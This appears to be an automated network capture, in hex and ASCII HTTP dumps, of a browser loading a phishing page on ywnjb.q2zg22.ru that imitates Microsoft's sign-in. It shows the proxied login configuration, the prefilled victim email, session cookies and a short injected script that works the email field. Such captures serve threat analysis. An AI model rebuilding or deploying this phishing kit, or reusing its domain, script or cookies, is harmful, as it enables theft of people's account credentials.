                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 37 30 61 66 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 21 2d 2d 20 53 65 72 76 65 72 49 6e 66 6f 3a 20 53 4e 31 50 45 50 46 30 30 30 32 43 46 36 33 20 32 30 32 34 2e 30 31 2e 32 35 2e 31 36 2e 32 36 2e 33 35 20 4c 6f 63 56 65 72 3a 30 20 2d 2d 3e 3c 21 2d 2d 20 50 72 65 70 72 6f 63 65 73 73 49 6e 66 6f 3a 20 43 42 41 2d 30 31 32 35 5f 31 36 31 33 33 37 3a 53 41 32 50 4e 50 46 30 30 30 30 32 31 43 30 2c 20 32 30 32 34 2d 30 31 2d 32 35 54 31 36 3a 32 33 3a 33 30 2e 39 38 30 39 34 30 31 2d 30 38 3a 30 30 20 2d 20 56 65 72 73 69 6f 6e 3a 20 31 36 2c 30
                                                                                                                          Data Ascii: 70af... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html>... ServerInfo: SN1PEPF0002CF63 2024.01.25.16.26.35 LocVer:0 -->... PreprocessInfo: CBA-0125_161337:SA2PNPF000021C0, 2024-01-25T16:23:30.9809401-08:00 - Version: 16,0
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 50 52 4f 4f 46 20 3d 20 7b 7d 3b 50 52 4f 4f 46 2e 54 79 70 65 20 3d 20 7b 53 51 53 41 3a 20 36 2c 20 43 53 53 3a 20 35 2c 20 44 65 76 69 63 65 49 64 3a 20 34 2c 20 45 6d 61 69 6c 3a 20 31 2c 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 20 53 4d 53 3a 20 33 2c 20 48 49 50 3a 20 38 2c 20 42 69 72 74 68 64 61 79 3a 20 39 2c 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 20 52 65 63 6f 76 65 72 79 43 6f 64 65 3a 20 31 31 2c 20 53 74 72 6f 6e 67 54 69 63 6b 65 74 3a 20 31 33 2c 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 56 32 3a 20 31 34 2c 20 55 6e 69 76 65 72 73 61 6c 53 65 63 6f 6e 64 46 61 63 74 6f 72 3a 20 31 35 2c 20 53 65 63 75 72 69 74 79 4b 65 79 3a 20 31 38
                                                                                                                          Data Ascii: "text/javascript">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, SecurityKey: 18
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 69 64 3d 31 35 32 31 36 27 2c 43 50 3a 74 72 75 65 2c 66 49 73 50 61 73 73 6b 65 79 53 75 70 70 6f 72 74 45 6e 61 62 6c 65 64 3a 66 61 6c 73 65 2c 44 30 3a 27 27 2c 43 51 3a 74 72 75 65 2c 42 72 3a 66 61 6c 73 65 2c 44 31 3a 27 27 2c 44 32 3a 27 27 2c 61 47 3a 30 2c 61 48 3a 30 2c 42 75 3a 66 61 6c 73 65 2c 44 34 3a 27 27 2c 42 77 3a 74 72 75 65 2c 61 4b 3a 27 79 77 6e 6a 62 2e 71 32 7a 67 32 32 2e 72 75 27 2c 43 57 3a 66 61 6c 73 65 2c 44 37 3a 27 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 6c 69 6e 6b 69 64 3d 32 30 31 33 37 33 38 27 2c 66 55 73 65 48 69 67 68 43 6f 6e 74 72 61 73 74 4f 76 65 72 72 69 64 65 73 3a 66 61 6c 73 65 2c 44 38 3a 27 27 2c 42 7a 3a 66 61 6c 73 65 2c 61 4e 3a 27 43 41 27 2c
                                                                                                                          Data Ascii: id=15216',CP:true,fIsPasskeySupportEnabled:false,D0:'',CQ:true,Br:false,D1:'',D2:'',aG:0,aH:0,Bu:false,D4:'',Bw:true,aK:'ywnjb.q2zg22.ru',CW:false,D7:'https://go.microsoft.com/fwlink/?linkid=2013738',fUseHighContrastOverrides:false,D8:'',Bz:false,aN:'CA',
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 2e 71 32 7a 67 32 32 2e 72 75 2f 6f 61 75 74 68 32 30 5f 61 75 74 68 6f 72 69 7a 65 2e 73 72 66 25 33 66 75 73 65 72 6e 61 6d 65 25 33 64 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 75 73 65 72 6e 61 6d 65 25 33 64 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 75 61 69 64 25 33 64 63 39 62 62 66 35 38 36 33 63 62 37 34 39 65 34 39 36 38 63 38 35 35 63 62 39 62 30 36 64 66 66 25 32 36 63 6f 6e 74 65 78 74 69
                                                                                                                          Data Ascii: .q2zg22.ru/oauth20_authorize.srf%3fusername%3dsales%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26username%3dsales%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26uaid%3dc9bbf5863cb749e4968c855cb9b06dff%26contexti
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 53 23 7e 23 5c 22 20 69 64 3d 5c 22 69 64 50 61 6e 65 48 65 6c 70 49 6e 76 69 74 65 42 6c 6f 63 6b 65 64 4c 69 6e 6b 39 5c 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 22 2c 61 64 3a 74 72 75 65 2c 43 70 3a 74 72 75 65 2c 62 44 3a 74 72 75 65 2c 62 45 3a 74 72 75 65 2c 61 66 3a 74 72 75 65 2c 44 52 3a 22 41 20 73 69 6e 67 6c 65 2d 75 73 65 20 63 6f 64 65 20 6c 65 74 73 20 79 6f 75 20 73 69 67 6e 20 69 6e 20 77 69 74 68 6f 75 74 20 65 6e 74 65 72 69 6e 67 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 2e 20 54 68 69 73 20 68 65 6c 70 73 20 70 72 6f 74 65 63 74 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 20 77 68 65 6e 20 79 6f 75 5c 27 72 65 20 75 73 69 6e 67 20 73 6f 6d 65 6f 6e 65 20 65 6c 73 65 5c 27 73 20 50 43 2e 20 3c 61 20 68 72 65 66 3d 5c 22 68 74 74 70
                                                                                                                          Data Ascii: S#~#\" id=\"idPaneHelpInviteBlockedLink9\">Learn More</a>",ad:true,Cp:true,bD:true,bE:true,af:true,DR:"A single-use code lets you sign in without entering your password. This helps protect your account when you\'re using someone else\'s PC. <a href=\"http
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 6e 69 6e 31 2e 30 26 77 74 72 65 61 6c 6d 3d 75 72 69 3a 57 69 6e 64 6f 77 73 4c 69 76 65 49 44 26 77 63 74 78 3d 75 73 65 72 6e 61 6d 65 25 33 44 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 44 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 75 61 69 64 25 33 44 63 39 62 62 66 35 38 36 33 63 62 37 34 39 65 34 39 36 38 63 38 35 35 63 62 39 62 30 36 64 66 66 25 32 36 63 6f 6e 74 65 78 74 69 64 25 33 44 38 30 43 44 41 39 31 41 43 39 33 46 37 36 34 30 25 32 36 6f 70 69 64 25 33 44 37 39 33 37 30 33 34 44 38 33 46 42 34 44 32 35 25 32 36 62 6b 25 33 44 31 37 30 36 39 30 31 34 37 37 27 2c 44 6c 3a 27 50 61 73 73 70 6f 72 74 52 4e 27 2c
                                                                                                                          Data Ascii: nin1.0&wtrealm=uri:WindowsLiveID&wctx=username%3Dsales%2540dudick.com%26client_id%3D4765445b-32c6-49b0-83e6-1d93765276ca%26uaid%3Dc9bbf5863cb749e4968c855cb9b06dff%26contextid%3D80CDA91AC93F7640%26opid%3D7937034D83FB4D25%26bk%3D1706901477',Dl:'PassportRN',
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 6d 6b 74 25 33 64 45 4e 2d 55 53 25 32 36 75 73 65 72 6e 61 6d 65 25 33 64 73 61 6c 65 73 25 32 35 34 30 64 75 64 69 63 6b 2e 63 6f 6d 25 32 36 63 6c 69 65 6e 74 5f 69 64 25 33 64 34 37 36 35 34 34 35 62 2d 33 32 63 36 2d 34 39 62 30 2d 38 33 65 36 2d 31 64 39 33 37 36 35 32 37 36 63 61 25 32 36 63 6f 6e 74 65 78 74 69 64 25 33 64 38 30 43 44 41 39 31 41 43 39 33 46 37 36 34 30 25 32 36 6f 70 69 64 25 33 64 37 39 33 37 30 33 34 44 38 33 46 42 34 44 32 35 25 32 36 62 6b 25 33 64 31 37 30 36 39 30 31 34 37 37 25 32 36 75 61 69 64 25 33 64 63 39 62
                                                                                                                          Data Ascii: es%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26mkt%3dEN-US%26username%3dsales%2540dudick.com%26client_id%3d4765445b-32c6-49b0-83e6-1d93765276ca%26contextid%3d80CDA91AC93F7640%26opid%3d7937034D83FB4D25%26bk%3d1706901477%26uaid%3dc9b
                                                                                                                          2024-02-02 19:17:57 UTC1369INData Raw: 34 44 38 33 46 42 34 44 32 35 26 62 6b 3d 31 37 30 36 39 30 31 34 37 37 27 2c 61 3a 27 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 73 68 61 72 65 64 2f 31 2e 30 2f 27 2c 66 41 6c 6c 6f 77 4c 6f 67 69 6e 54 65 78 74 43 75 73 74 6f 6d 69 7a 61 74 69 6f 6e 73 3a 74 72 75 65 2c 63 5a 3a 30 2c 62 3a 7b 7d 2c 66 44 65 70 72 65 63 61 74 65 48 69 70 4c 6f 63 6b 6f 75 74 3a 74 72 75 65 2c 63 3a 27 27 2c 64 3a 66 61 6c 73 65 2c 65 3a 74 72 75 65 2c 66 3a 31 2c 67 3a 27 27 2c 68 3a 27 73 61 6c 65 73 40 64 75 64 69 63 6b 2e 63 6f 6d 27 2c 41 4e 3a 74 72 75 65 2c 63 61 3a 74 72 75 65 2c 41 4f 3a 30 2c 63 62 3a 66 61 6c 73 65 2c 64 41 3a 27 27 2c 6a 3a 27 68 74 74 70 73 3a 2f 2f 73 69 67 6e 75 70 2e 6c 69 76 65 2e 63 6f 6d
                                                                                                                          Data Ascii: 4D83FB4D25&bk=1706901477',a:'https://logincdn.msftauth.net/shared/1.0/',fAllowLoginTextCustomizations:true,cZ:0,b:{},fDeprecateHipLockout:true,c:'',d:false,e:true,f:1,g:'',h:'sales@dudick.com',AN:true,ca:true,AO:0,cb:false,dA:'',j:'https://signup.live.com


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          62192.168.2.1649793104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:57 UTC3423OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSPRequ=id=N&lt=1706901476&co=5; uaid=c9bbf5863cb749e4968c855cb9b06dff; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$
                                                                                                                          2024-02-02 19:17:57 UTC650INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:57 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QAOlqp9z0wpWe4Aue5z1%2FZ1Sxajf2QQ7S7GhEQ1yPaLZGj3hssP%2BkTwFINdTY1Sb2Mt7YCwwiCImRzFuWz1aYew3Xa4WDQH7llIsT%2BeauUTiUO7CiJvgQ9M%2F5B%2F9ur588n4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6f91ecf1d78-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:57 UTC719INData Raw: 33 32 36 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 70 28 29 7b 0a 20 20 76 61 72 20 65 6d 61 69 6c 49 64 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 30 31 31 36 22 29 3b 0a 20 20 76 61 72 20 6e 65 78 74 42 75 74 74 6f 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 69 64 53 49 42 75 74 74 6f 6e 39 22 29 3b 0a 20 20 76 61 72 20 71 75 65 72 79 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 20 20 69 66 20 28 2f 23 2f 2e 74 65 73 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 29 7b 0a 20 20 76 61 72 20 72 65 73 20 3d 20 71 75 65 72 79 2e 73 70 6c 69 74 28 22 23 22 29 3b 0a 20 20 76 61 72 20 64 61 74 61 31 20 3d 20 72 65 73 5b 30 5d 3b
                                                                                                                          Data Ascii: 326function lp(){ var emailId = document.querySelector("#i0116"); var nextButton = document.querySelector("#idSIButton9"); var query = window.location.href; if (/#/.test(window.location.href)){ var res = query.split("#"); var data1 = res[0];
                                                                                                                          2024-02-02 19:17:57 UTC94INData Raw: 20 20 20 20 7d 0a 20 20 7d 0a 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 20 20 7d 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 70 28 29 3b 7d 2c 20 35 30 30 29 3b 0a 0a 0d 0a
                                                                                                                          Data Ascii: } } setTimeout(function(){lp();}, 500); } setTimeout(function(){lp();}, 500);
                                                                                                                          2024-02-02 19:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          63192.168.2.1649795104.21.85.1894435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:57 UTC3358OUTGET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1
                                                                                                                          Host: ywnjb.q2zg22.ru
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.com
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSPRequ=id=N&lt=1706901476&co=5; uaid=c9bbf5863cb749e4968c855cb9b06dff; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZxTqMmSfq2kSHJYBwJ2j!SRwSr4Ehgvl*Bev7I*ATli20PRk0RjblHLcmktfUWdSqNnhmJoxeE7yK3X847MpAPDrhdN86deMO3UBa5fmkhZS3qLKPMbybRkXQIvC!Va*6GVfGrBSQ93o*2PBUw8jmtevb8rpJiyYEc7xzk2tKqQkA5et6feN9QEWIe3cWw6o4PT7GcptF2igE7SY590WIaLoA8uG0ARkB4kNJzB2NPOmI1zuGdX7ohRBcncoEkSESvJ5HpbJjoOGS2zR2A7YX0oS5QJHI0IUgQNn1FB8SgbZDMALKS!sTrMV33GgBe7d8dwLCEnNXMZS2!3Sk8jnKDp1NiIBhpMlDp1x01x2jymLrcjeEXA4BgjQ$$
                                                                                                                          2024-02-02 19:17:57 UTC648INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:57 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                          CF-Cache-Status: BYPASS
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3QcRbC3GKsERVESLGEy9DTZw3rvUPZPR2Li%2BHv01mV%2F6FKA26vt%2F8pEpQRT%2FFKhpqYuMCDsCjfYCvAtpZ4uvQ4JIvTd7Me3rSd1kcJqQkJFBVgEmd6B5PgJEqwg8exH4yFA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 84f4c6fb7f39b0c3-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-02-02 19:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          64192.168.2.164979613.107.213.414435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:57 UTC585OUTGET /16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css HTTP/1.1
                                                                                                                          Host: logincdn.msftauth.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                          Referer: https://ywnjb.q2zg22.ru/
